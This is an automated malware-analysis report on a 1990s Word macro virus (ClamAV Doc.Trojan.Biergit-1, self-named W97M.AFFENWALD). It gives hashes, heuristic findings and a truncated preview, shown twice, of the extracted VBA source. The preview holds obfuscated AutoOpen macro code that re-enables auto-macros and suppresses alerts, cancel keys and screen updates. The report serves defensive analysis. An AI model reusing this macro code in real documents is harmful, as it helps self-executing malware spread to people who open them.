Office (OLE) malware analysis — malicious · 09bb6a84970cd89a

MALICIOUS

Office (OLE)

80.0 KB Created: 2001-01-29 22:43:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 2383e4d4f9c145110b821fad3959a785 SHA-1: ca8430408c1ae2981dfdfdad0e32d2a968512fdf SHA-256: 09bb6a84970cd89a1b70a9531566b14639fd00bbb5f132bede6f6c32e81be223

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Biergit-1. Static analysis detected a legacy WordBasic AutoOpen macro, a common indicator of malicious documents. The embedded URL, while not directly used by the macro in the provided snippet, suggests a potential command and control or payload delivery vector.

Heuristics 5

ClamAV: Doc.Trojan.Biergit-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Biergit-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://www.moritzlangner.de In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 49358 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	49358 bytes
SHA-256: `0b50cb9536bcd15b6e52a43cc19951cde5403a28abd3cc9ace72f0dd416e23ed`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Kz876" Rem AWUDJUOKVRDJIICWYQYJPEWARFHKXSJWTTTDQHWY Rem A Rem HBEZMWXMVHOCUOT Rem EQZIGWDOPPS Rem ZYGHFITZUZAZSVXHFGCJIDYRYZNTSVRJQ Rem TMQFSXAHUVURBFSCHFTFQKSTYARXSH Rem KHZUSKTHJLYDQJCECL Rem GYSRARMXFTNAHMPFVCOEQUJJNZHGBXICPE Rem AGDOVOFMUREWZK Rem QTSRGHNKANITQPLOFHMHMJWMFQCCUVRF Rem QSGKRHYFQDELLPKBEEWOIBJWEJENFHFZERQI Rem NNVEUQENYRPZUBDKJZOVMRM Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer Rem RRKGJCRDSDPTJCGJ Rem XGMWLZFWCJLQYXXEWRCHNQSHHKJQRKMITYODGWR Rem SAHUPNOZDXNVURMOZGOESMUYJCPXSLL Rem KKHHQKQIQJAVOOTUEGNKY Rem VJCV Rem JQMJBAICLIHB Rem GXGVGTJSYVDXKVCCPAOFFHHEWBFDIVMY Rem UNVABFETVFLGIXJEZYNCITPMGXQA Rem UBYDCBFVYZFLG Rem EFNTJLVHUJMFJTGGOJ Rem XLRNNMJKHBGZBKJMEMGQOE Rem KHZUSKTHJLYDQJCECL Declare Function SwapMouseButton Lib "USER32" (ByVal bSwap As Long) As Long Rem XLRNNMJKHBGZBKJMEMGQOE Rem FZXHYYWJFXZGYVWPGIMUYSJKKOFURQLYUSGTHZQF Rem JDNSVNMRLDHPHGFENRZGKVEVOIEOHLEU Rem HUKRHMIHXOPGRKUSPDMJT Rem FCPZBCKRUODJKYNP Rem SWRJGGXWMMPPUHILNIMH Rem WNCPFCTTVNFIGZSJSBJABFOUFRJVXOLVIAYYPAVU Rem FFALGPLPUFFYDLZJ Rem WDIDBZHNFFBEPYF Rem CMQKSOYFNUEPZNWHZRJENRVUXEKUXNPWG Rem EHULFIPTOUWIYK Rem ZARYDJMXEVQFBXMRBAYFXLEHTWGJWWKPEY Rem CBOYFJX Rem QLOLEZZHJHRNWNA Rem NULZDRSTMZWERHWTKCQCRICQ Rem LMFEVKKFFYYBHAEK Rem NRJQEXJVEMATVHKNARZCUBZZR Rem DXDPAVXFXKUSXZNMDDXHDYCXVQEOKEQZYMNLRL Rem RWKU Rem QVQYZIMMMAMVRVCVGM Rem YEYOVQMNEYQCWUOJGOYBPMJNJQODGJPOOYTTBK Sub AutoOpen() Rem XKWUXWGQNUMJSNOMJSPSZIWXN Rem IXWFCJTYQMGG Rem VYQZLJQEJGJB Rem MHIKRKXE Rem XTUZYEHSJGAUPMYLUWKPYUJLGLUJMCCXU Rem FYYSXAUMYSFUNAMUKYOHWRYT Rem MLJBZPHMIVSWFCMDEMVRUBFPZUEPRYNNK Rem ZZPGKGRQNEBFXYQHNWONBQFSAIUNHVTNVRVQWYD Rem SGPILZZQNDJYEPJLPVHWCJVWEX Rem IZNNFYHTIOVECCSDLLPUTDISAKHSRW ' Word97 Macro Virii Creation Kit Rem R Rem HAYEBRCIUASRIRBFJBRCVORTC Rem RXDXRUGQPBMUPXVRPBDQNFTRZJAVUNG ' =============================== ' Code by Jack Twoflower/LzØ Vx ' =============================== Rem NANFCF Rem RVAOPSNTDHSORAVSDWJVWYTALDXWFCGMXS Rem RFQXLDNREGREHGSWRPGUVAWMBIXULQYGMLBIGN Rem UPDILHNAVSTEFESLXUUNDAOBFBG Rem DEAEFMRSMISZMEUEEQFVMCSVJESQ Rem LMGFOGTNMGOWLQU Rem FNDITWQRPXEJVKIGGZYMUDN Rem X Rem DGCLJQVOZZOLPQFWJOADVLUMBGAHJ ' W97M.°°AFFENWALD°° On Error Resume Next Rem GJWNWDYGBTSNAVCYHPCDJWFFBAD Rem EPRCQTULCMOBKDDIZPHKMBLLYHENINKGBQJOWKP Rem OR Rem LFSIVCARBPBZCGLGEKXDDYEDXNCQAUWSRJTNZGUU Rem KUVEG Rem BSOKBWQVXDXYZVBANKJLHCNREDJEQY Rem LADLZQRRUSBWNVWFIHMRDOTXRCRUL WordBasic.DisableAutoMacros 0 Rem SHRYBMOHPLCPUQKE Rem OQQBZFPNYQUUUHJMQMWEHICHO Rem HYNX ActiveDocument.ReadOnlyRecommended = False Rem DHWRMOGAGYBWCSGXBPMWLVV Rem IPDAVCRNKRMTZKDOHFOUKBWRODGEMLIWOUT Rem YMZLTSFERZUOJHTGSP With Application Rem UILFCZ Rem JIKJDFQDROBAVQFPFPFWPUVYAAYKQ .EnableCancelKey = wdCancelDisabled Rem STNQIVPMTCLJGGDWZKUAUTBOALRRD Rem PZCFVAHAPGESOHHXTUALLI Rem YWLSDUTBOCCFRMFMJWSCHHFUZVVIPZTLOCOY .DisplayAlerts = wdAlertsNone Rem G Rem IVQ Rem HMWOAACMOXNIQRFPJJWMHGOMFYIACQ Rem VRBMCRULANPWIHPJOQRDRYUYDHSGYYWXEYCUSYL Rem MALHTXVECADJEZWPSDGAVUUILOUOFFJOINLOBOFZ .ScreenUpdating = False Rem DSVRLIQLOVSUGCFSPWRBMPQWEMIAHVSGVNQLSD Rem CPEYCLHWTHRGCA Rem ERJMNJJKGALMECTBNACYFIOQXTUWCFTAOFY Rem UZYJLWEGGCSKSEKPNRJXRLIELRNFPRNSDG Rem XSHUDGIY Rem LUTJWOM Rem RDXKECXGNNEUZBCVUIQE Rem CPEYCLHWTHRGCA Rem EWQNFDRZKECHZDGZQ ... (truncated)

SHA-256: 0b50cb9536bcd15b6e52a43cc19951cde5403a28abd3cc9ace72f0dd416e23ed

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Kz876"
    Rem AWUDJUOKVRDJIICWYQYJPEWARFHKXSJWTTTDQHWY
    Rem A
    Rem HBEZMWXMVHOCUOT
    Rem EQZIGWDOPPS
    Rem ZYGHFITZUZAZSVXHFGCJIDYRYZNTSVRJQ
    Rem TMQFSXAHUVURBFSCHFTFQKSTYARXSH

    Rem KHZUSKTHJLYDQJCECL
    Rem GYSRARMXFTNAHMPFVCOEQUJJNZHGBXICPE
    Rem AGDOVOFMUREWZK
    Rem QTSRGHNKANITQPLOFHMHMJWMFQCCUVRF
    Rem QSGKRHYFQDELLPKBEEWOIBJWEJENFHFZERQI
    Rem NNVEUQENYRPZUBDKJZOVMRM
Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
    Rem RRKGJCRDSDPTJCGJ
    Rem XGMWLZFWCJLQYXXEWRCHNQSHHKJQRKMITYODGWR
    Rem SAHUPNOZDXNVURMOZGOESMUYJCPXSLL
    Rem KKHHQKQIQJAVOOTUEGNKY
    Rem VJCV
    Rem JQMJBAICLIHB
    Rem GXGVGTJSYVDXKVCCPAOFFHHEWBFDIVMY
    Rem UNVABFETVFLGIXJEZYNCITPMGXQA
    Rem UBYDCBFVYZFLG
    Rem EFNTJLVHUJMFJTGGOJ
    Rem XLRNNMJKHBGZBKJMEMGQOE
    Rem KHZUSKTHJLYDQJCECL
Declare Function SwapMouseButton Lib "USER32" (ByVal bSwap As Long) As Long
    Rem XLRNNMJKHBGZBKJMEMGQOE
    Rem FZXHYYWJFXZGYVWPGIMUYSJKKOFURQLYUSGTHZQF
    Rem JDNSVNMRLDHPHGFENRZGKVEVOIEOHLEU
    Rem HUKRHMIHXOPGRKUSPDMJT
    Rem FCPZBCKRUODJKYNP
    Rem SWRJGGXWMMPPUHILNIMH
    Rem WNCPFCTTVNFIGZSJSBJABFOUFRJVXOLVIAYYPAVU
    Rem FFALGPLPUFFYDLZJ
    Rem WDIDBZHNFFBEPYF
    Rem CMQKSOYFNUEPZNWHZRJENRVUXEKUXNPWG
    Rem EHULFIPTOUWIYK
    Rem ZARYDJMXEVQFBXMRBAYFXLEHTWGJWWKPEY

    Rem CBOYFJX
    Rem QLOLEZZHJHRNWNA
    Rem NULZDRSTMZWERHWTKCQCRICQ
    Rem LMFEVKKFFYYBHAEK
    Rem NRJQEXJVEMATVHKNARZCUBZZR
    Rem DXDPAVXFXKUSXZNMDDXHDYCXVQEOKEQZYMNLRL
    Rem RWKU
    Rem QVQYZIMMMAMVRVCVGM
    Rem YEYOVQMNEYQCWUOJGOYBPMJNJQODGJPOOYTTBK
Sub AutoOpen()
    Rem XKWUXWGQNUMJSNOMJSPSZIWXN

    Rem IXWFCJTYQMGG
    Rem VYQZLJQEJGJB
    Rem MHIKRKXE
    Rem XTUZYEHSJGAUPMYLUWKPYUJLGLUJMCCXU
    Rem FYYSXAUMYSFUNAMUKYOHWRYT
    Rem MLJBZPHMIVSWFCMDEMVRUBFPZUEPRYNNK
    Rem ZZPGKGRQNEBFXYQHNWONBQFSAIUNHVTNVRVQWYD
    Rem SGPILZZQNDJYEPJLPVHWCJVWEX
    Rem IZNNFYHTIOVECCSDLLPUTDISAKHSRW
    ' Word97 Macro Virii Creation Kit
    Rem R
    Rem HAYEBRCIUASRIRBFJBRCVORTC
    Rem RXDXRUGQPBMUPXVRPBDQNFTRZJAVUNG
    ' ===============================
    ' Code by Jack Twoflower/LzØ Vx
    ' ===============================
    Rem NANFCF
    Rem RVAOPSNTDHSORAVSDWJVWYTALDXWFCGMXS
    Rem RFQXLDNREGREHGSWRPGUVAWMBIXULQYGMLBIGN
    Rem UPDILHNAVSTEFESLXUUNDAOBFBG
    Rem DEAEFMRSMISZMEUEEQFVMCSVJESQ
    Rem LMGFOGTNMGOWLQU
    Rem FNDITWQRPXEJVKIGGZYMUDN
    Rem X
    Rem DGCLJQVOZZOLPQFWJOADVLUMBGAHJ
    ' W97M.°°AFFENWALD°°

On Error Resume Next
    Rem GJWNWDYGBTSNAVCYHPCDJWFFBAD
    Rem EPRCQTULCMOBKDDIZPHKMBLLYHENINKGBQJOWKP
    Rem OR
    Rem LFSIVCARBPBZCGLGEKXDDYEDXNCQAUWSRJTNZGUU
    Rem KUVEG
    Rem BSOKBWQVXDXYZVBANKJLHCNREDJEQY
    Rem LADLZQRRUSBWNVWFIHMRDOTXRCRUL
WordBasic.DisableAutoMacros 0
    Rem SHRYBMOHPLCPUQKE
    Rem OQQBZFPNYQUUUHJMQMWEHICHO
    Rem HYNX
ActiveDocument.ReadOnlyRecommended = False
    Rem DHWRMOGAGYBWCSGXBPMWLVV
    Rem IPDAVCRNKRMTZKDOHFOUKBWRODGEMLIWOUT
    Rem YMZLTSFERZUOJHTGSP
With Application
    Rem UILFCZ
    Rem JIKJDFQDROBAVQFPFPFWPUVYAAYKQ
.EnableCancelKey = wdCancelDisabled
    Rem STNQIVPMTCLJGGDWZKUAUTBOALRRD
    Rem PZCFVAHAPGESOHHXTUALLI
    Rem YWLSDUTBOCCFRMFMJWSCHHFUZVVIPZTLOCOY
.DisplayAlerts = wdAlertsNone
    Rem G
    Rem IVQ
    Rem HMWOAACMOXNIQRFPJJWMHGOMFYIACQ
    Rem VRBMCRULANPWIHPJOQRDRYUYDHSGYYWXEYCUSYL
    Rem MALHTXVECADJEZWPSDGAVUUILOUOFFJOINLOBOFZ
.ScreenUpdating = False
    Rem DSVRLIQLOVSUGCFSPWRBMPQWEMIAHVSGVNQLSD
    Rem CPEYCLHWTHRGCA
    Rem ERJMNJJKGALMECTBNACYFIOQXTUWCFTAOFY
    Rem UZYJLWEGGCSKSEKPNRJXRLIELRNFPRNSDG
    Rem XSHUDGIY
    Rem LUTJWOM
    Rem RDXKECXGNNEUZBCVUIQE
    Rem CPEYCLHWTHRGCA
    Rem EWQNFDRZKECHZDGZQ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.